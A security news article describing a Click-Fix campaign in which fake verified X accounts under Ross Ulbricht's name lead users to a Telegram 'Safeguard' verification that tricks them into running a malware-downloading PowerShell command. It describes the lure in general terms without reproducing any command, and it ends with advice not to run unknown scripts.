Following Ross Ulbricht’s pardon by US President Donald Trump, threat actors on X have found a new way to sully the man’s name. Hackers are using fake but verified X accounts under Ulbricht’s name to lure unsuspecting users to Telegram channels only to trick them into running malicious PowerShell code on their PCs. Candid.Technology did not find any such accounts active at the time of writing, and older accounts seem to have been suspended by X.
The attack was first spotted by vx-underground and is a variant of the Click-Fix tactic that has picked up pace in the cybercrime scene over 2024. The tactic tricks users into thinking they’re verifying their identity but instead runs code on users’ systems that can load malware, RATs (Remote Access Trojans), or other malicious programs on their PC.
In this case, hackers are using fake accounts under Ulbricht’s name to direct people to Telegram channels they claim to be official Ulbricht portals providing information on his pending release and signing a clemency document. Once the Telegram channel opens, an identity verification process called Safeguard becomes active and walks users through a verification process.
Users are shown a Telegram mini app running a fake verification dialog. This mini app also automatically copies a PowerShell command on the device’s clipboard, and users are prompted to paste this in their Windows Run dialog and run it for verification. The underlying pretext here is that once you verify your identity by running this command, you’ll be redirected to the desired Telegram group or channel.
However, instead of verifying a user’s identity, the command executes a script that in turn downloads a ZIP file containing multiple files, including one called identity-helper.exe. A VirusTotal scan of the ZIP archive results in only one of 65 security vendors flagging it as malicious, a comment on the identity_helper.exe file on the malware analysis platform indicates that it could be a Cobalt Strike loader.
Cobalt Strike is a popular penetration testing tool that’s also used by hackers to gain remote access to a computer and any connected networks. Such attacks are generally the first step in a large-scale ransomware attack or data breach.
As a security precaution, Candid.Technology strongly advises against running any scripts or commands our readers find on the internet, unless they have an understanding of what the command will be doing on their system. Analysing the contents of a command or script before running can help users spot any malicious commands or obfuscations that might hurt their devices.
In the News: Cybercrooks impersonate Gravatar and ProtonMail to phish people